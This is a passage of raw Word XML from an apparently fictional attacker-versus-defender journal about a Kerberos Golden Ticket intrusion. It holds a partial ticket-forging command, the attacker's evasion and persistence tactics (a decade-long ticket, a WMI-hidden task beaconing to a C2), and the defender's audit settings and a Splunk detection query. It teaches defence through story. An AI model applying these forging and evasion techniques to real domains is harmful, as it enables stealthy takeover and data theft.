        <w:t>-1-5-21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>-... /krbtgt:&lt;hash&gt; /ticket:fakeuser.kirbi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B076FBB" w14:textId="53F31B3C" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:r w:rsidRPr="00C72B94">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/id:500</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72B94">
        <w:t xml:space="preserve"> makes this look like the built-in Administrator account. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/groups:512,513,518,519</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72B94">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32" w:rsidRPr="00C72B94">
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72B94">
        <w:t xml:space="preserve"> Domain Admins, Domain Users, Schema Admins, and Enterprise Admins. This ticket is now more powerful than a</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>ny</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72B94">
        <w:t xml:space="preserve"> real Domain Admin account because it's completely under my control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1684C0C7" w14:textId="39EEF6E3" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:r>
        <w:t>But here’s the thing: I don’t want to use this aggressively. A Golden Ticket is a precision instrument, not a blunt weapon. Every time I present this TGT to request a service ticket, the DC will log</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Event ID 4769. If the defender is watching for anomalies – like a non-existent user requesting service tickets, or an account with impossible group memberships – they might catch me.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8080D" w14:textId="1F823111" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> my operational plan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEC822E" w14:textId="7A989646" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Use the Golden Ticket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sparingly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – maybe once a week to refresh access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE17D88" w14:textId="7FC31381" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Request service tickets only for specific targets I need</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EB48F6" w14:textId="6F486158" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Never use it during business hours when log volume is high and anomalies stand out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F72502" w14:textId="2928713E" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Always tunnel through legitimate-looking protocols like HTTPS or DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E5175F" w14:textId="3761EED6" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If I ever suspect detection, burn everything, walk away and tell </w:t>
      </w:r>
      <w:r w:rsidR="000D0F3B">
        <w:t>@1337H@ck3RKoO!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exfiltrate that data</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> on their own time</w:t>
      </w:r>
      <w:r>
        <w:t>… I’m not going down for this, if caught.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC9E4C6" w14:textId="2C3C8320" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:r>
        <w:t xml:space="preserve">Tonight, I’m testing. I want to see if their DC will accept my forged TGT. I’ll request a service ticket for </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CIFS/FILESERVER01.corp.target.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and try to list some shares. If it works… if it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">works… </w:t>
      </w:r>
      <w:r>
        <w:t>then I own the domain completely, silently, and awesomely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A060A30" w14:textId="459A9FDB" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:r>
        <w:t xml:space="preserve">I’m also going to create a second Golden Ticket with a different fake user and different group memberships. Redundancy. If they catch and invalidate one, I have another. And another. And another. Hell, I can make as many as I want at that point. That’s the beauty of knowing the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash – the poor KDC can’t distinguish between legitimate and forged tickets. It literally cannot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAE5E70" w14:textId="6EB81712" w:rsidR="00C72B94" w:rsidRDefault="00C72B94" w:rsidP="00C72B94">
      <w:r>
        <w:t xml:space="preserve">One more thing to add: I’m setting the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>RenewTill</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> field to 10 years from now. Normal TGTs expire in 10 hours and need renewal. Mine doesn’t. I can use this same ticket for a decade unless they think to rotate that</w:t>
      </w:r>
      <w:r w:rsidR="00592855">
        <w:t xml:space="preserve"> stubborn </w:t>
      </w:r>
      <w:r w:rsidR="00592855" w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidR="00592855">
        <w:t xml:space="preserve"> password. Which they won’t, because rotating </w:t>
      </w:r>
      <w:r w:rsidR="00592855" w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidR="00592855">
        <w:t xml:space="preserve"> breaks, like, everything. What can I say? It’s the most perfect persistence mechanism ever.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1558FF0F" w14:textId="6B3ACEC6" w:rsidR="00592855" w:rsidRDefault="00592855" w:rsidP="00C72B94">
      <w:r>
        <w:t>Time to find out if this domain belongs to me.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EF4009" w14:textId="72FA6710" w:rsidR="00592855" w:rsidRPr="00A40F32" w:rsidRDefault="00592855" w:rsidP="00C72B94">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 5 – 0223</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B50323" w14:textId="0EFBD021" w:rsidR="00592855" w:rsidRPr="00A40F32" w:rsidRDefault="00592855" w:rsidP="00C72B94">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker’s Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A09F662" w14:textId="7132256F" w:rsidR="00592855" w:rsidRDefault="00592855" w:rsidP="00C72B94">
      <w:r>
        <w:t>It worked. I</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> cannot believe it - it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> worked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DB7520" w14:textId="6B20F242" w:rsidR="00592855" w:rsidRDefault="00592855" w:rsidP="00C72B94">
      <w:r>
        <w:t xml:space="preserve">I presented the forged TGT to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>DC01.corp.target.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The DC didn’t blink twice. It served me a service ticket for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CIFS/FILESERVER01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> like I was a legitimate Domain Admin. I mounted the share. I browsed the CEOs personal folder. I saw files named “</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Merger_Discussion_DRAFT.docx</w:t>
      </w:r>
      <w:r>
        <w:t>,” “</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Board_Presentation_Q4.pptx</w:t>
      </w:r>
      <w:r>
        <w:t>,” and browsed through a file named “</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Cat</w:t>
      </w:r>
      <w:r w:rsidR="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Memes</w:t>
      </w:r>
      <w:r>
        <w:t>” which had… cat memes. Sigh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22152B30" w14:textId="1DEEDEAD" w:rsidR="00592855" w:rsidRDefault="00592855" w:rsidP="00C72B94">
      <w:r>
        <w:t>I am inside the most sensitive file share in the company, authenticated as a non-existent user, using a ticket I forged on a laptop in a Romanian data center, and I’m in California.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A994ED" w14:textId="1BD17B3D" w:rsidR="00592855" w:rsidRDefault="00592855" w:rsidP="00C72B94">
      <w:r>
        <w:t>This is freaking absurd. This is freaking beautiful. This is why I do this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CDDB4C" w14:textId="678861E1" w:rsidR="00592855" w:rsidRDefault="000D0F3B" w:rsidP="00C72B94">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>But</w:t>
      </w:r>
      <w:r w:rsidR="00592855">
        <w:t xml:space="preserve"> I’m not touching those files. Not yet. I took a screenshot for proof of concept to show </w:t>
      </w:r>
      <w:r>
        <w:t>@1337H@ck3RKoO!</w:t>
      </w:r>
      <w:r w:rsidR="00592855">
        <w:t xml:space="preserve"> I was able to get in, then unmounted the share. Tonight was just a test. The real operation starts next week. Slow. Methodical. Invisible I be.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315B7F24" w14:textId="544EDBE2" w:rsidR="00592855" w:rsidRDefault="00592855" w:rsidP="00C72B94">
      <w:r>
        <w:t>I did notice something I wanted to jot down: something interesting caught my eye in one of their file share listings: there’s a folder that was called “</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>IT_Security\Audit_Logs\BloodHound</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.” They </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>just</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> started running BloodHound. The export is dated November 3 at 1047 – about six hours after I pulled the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash. That means someone on the blue team may have figured out something happened and is now </w:t>
      </w:r>
      <w:r w:rsidR="00CE6E70">
        <w:t>trying</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to map their attack surface to find possible entry points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1368F617" w14:textId="45ADCED0" w:rsidR="00592855" w:rsidRDefault="00592855" w:rsidP="00C72B94">
      <w:r>
        <w:t>Too late, my friend. Way too late.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2592F0" w14:textId="3732BED4" w:rsidR="00592855" w:rsidRDefault="00592855" w:rsidP="00C72B94">
      <w:r>
        <w:t>Having discovered this fresh juicy information, I am going to start monitoring that BloodHound folder for activity. If they run it again, and I see new results, I’ll know they’re actively hunting. And if they’re indeed hunting… I need to be even more careful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298110E5" w14:textId="70819AD1" w:rsidR="00592855" w:rsidRDefault="00592855" w:rsidP="00C72B94">
      <w:r>
        <w:t xml:space="preserve">One more thing before I sign off: I created a scheduled task on </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>FILESERVER01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that runs once a week under the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> context. It does nothing visible – just opens a TCP connection to my C2 for three seconds, then closes it. It’s a heartbeat. If that connection fails for any reason within two consecutive weeks, I’ll know the environment has changed significantly (by way of password rotation, infrastructure overhaul, or I’ve been straight burned). If it succeeds, I know my persistence and foothold is intact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787AFB5A" w14:textId="4763346D" w:rsidR="00592855" w:rsidRDefault="00592855" w:rsidP="00C72B94">
      <w:r>
        <w:t>The task is hidden in the WMI repository, not the standard Task Scheduler database. Good luck finding that with your EDR, blue team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBD4F95" w14:textId="22000D82" w:rsidR="00592855" w:rsidRPr="00A40F32" w:rsidRDefault="00592855" w:rsidP="00C72B94">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 5 – 0845</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56521E2D" w14:textId="1E4BAE1F" w:rsidR="00592855" w:rsidRPr="00A40F32" w:rsidRDefault="00592855" w:rsidP="00C72B94">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defender’s Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019255DE" w14:textId="2637ABF3" w:rsidR="00592855" w:rsidRDefault="00592855" w:rsidP="00C72B94">
      <w:r>
        <w:t xml:space="preserve">I haven’t slept. I mean, technically I have – I passed out on my couch for three hours with my laptop still open on my chest – but it doesn’t count as sleep when you wake up every twenty minutes </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve">because </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32" w:rsidRPr="00A40F32">
        <w:t>I had too much caffeine so I took a sedative to cancel it out, now I'm in a liminal state of consciousness where I'm too tired to think but too wired to sleep, and also someone is forging tickets in my domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676AC580" w14:textId="51664906" w:rsidR="00AB64D5" w:rsidRDefault="00AB64D5" w:rsidP="00C72B94">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rotation is still on hold. I need to explain why to my CISO, and I need to do it without sounding like I’m panicking. Which I am. But, you know, gotta keep ‘professoinaling my professionalism.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E561BC3" w14:textId="096C797D" w:rsidR="00AB64D5" w:rsidRDefault="00AB64D5" w:rsidP="00C72B94">
      <w:r>
        <w:t>I spent yesterday building detection. Real detection. Not the trash we had before.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659E2868" w14:textId="6E8217FB" w:rsidR="00AB64D5" w:rsidRDefault="00AB64D5" w:rsidP="00C72B94">
      <w:r>
        <w:t>First, I enabled Advanced Audit Policy on all DCs for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D28EFD" w14:textId="139CDB52" w:rsidR="00AB64D5" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Audit Kerberos Service Ticket Operations (Success and Fail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E8FA5E" w14:textId="49DD959E" w:rsidR="00AB64D5" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Audit Kerberos Authentication Service (Success and Failure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D018CA" w14:textId="003C36E4" w:rsidR="00AB64D5" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Audit Directory Service Access (Success)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2317E5" w14:textId="039ED862" w:rsidR="00AB64D5" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:r>
        <w:t xml:space="preserve">This gives me Event IDs 4768, 4769, 4771, and 4662 with full detail. It’s going to generate a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>lot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of logs. But I need that data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F8AA8B" w14:textId="031ABE75" w:rsidR="00AB64D5" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:r>
        <w:t>Second, I deployed a custom Splunk search that looks for Golden Ticket indicators:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29458DF2" w14:textId="77777777" w:rsidR="00AB64D5" w:rsidRPr="00CE6E70" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>index=wineventlog (EventCode=4769 OR EventCode=4768)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6352B4" w14:textId="77777777" w:rsidR="00AB64D5" w:rsidRPr="00CE6E70" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>| eval Account_Name=coalesce(TargetUserName, Account_Name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3968C2C5" w14:textId="77777777" w:rsidR="00AB64D5" w:rsidRPr="00CE6E70" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>| eval Ticket_Encryption_Type=case(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0304D151" w14:textId="77777777" w:rsidR="00AB64D5" w:rsidRPr="00CE6E70" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">    TicketEncryptionType=="0x1", "DES-CBC-CRC",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADECA6B" w14:textId="77777777" w:rsidR="00AB64D5" w:rsidRPr="00CE6E70" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">    TicketEncryptionType=="0x3", "DES-CBC-MD5",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00085B58" w14:textId="77777777" w:rsidR="00AB64D5" w:rsidRPr="00CE6E70" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">    TicketEncryptionType=="0x11", "AES128-CTS-HMAC-SHA1-96",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA4FBBC" w14:textId="77777777" w:rsidR="00AB64D5" w:rsidRPr="00CE6E70" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">    TicketEncryptionType=="0x12", "AES256-CTS-HMAC-SHA1-96",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635A410D" w14:textId="77777777" w:rsidR="00AB64D5" w:rsidRPr="00CE6E70" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">    TicketEncryptionType=="0x17", "RC4-HMAC",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187E6A77" w14:textId="77777777" w:rsidR="00AB64D5" w:rsidRPr="00CE6E70" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">    TicketEncryptionType=="0x18", "RC4-HMAC-EXP",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C7096F" w14:textId="77777777" w:rsidR="00AB64D5" w:rsidRPr="00CE6E70" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">    true(), "Unknown")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C1B5A0" w14:textId="77777777" w:rsidR="00AB64D5" w:rsidRPr="00CE6E70" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>| stats dc(Ticket_Encryption_Type) as unique_enc_types, values(Ticket_Encryption_Type) as enc_types by Account_Name, IpAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640996C7" w14:textId="7C618DD8" w:rsidR="00AB64D5" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>| where unique_enc_types &gt; 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14949246" w14:textId="7527B9A4" w:rsidR="00AB64D5" w:rsidRDefault="00AB64D5" w:rsidP="00AB64D5">
      <w:r>
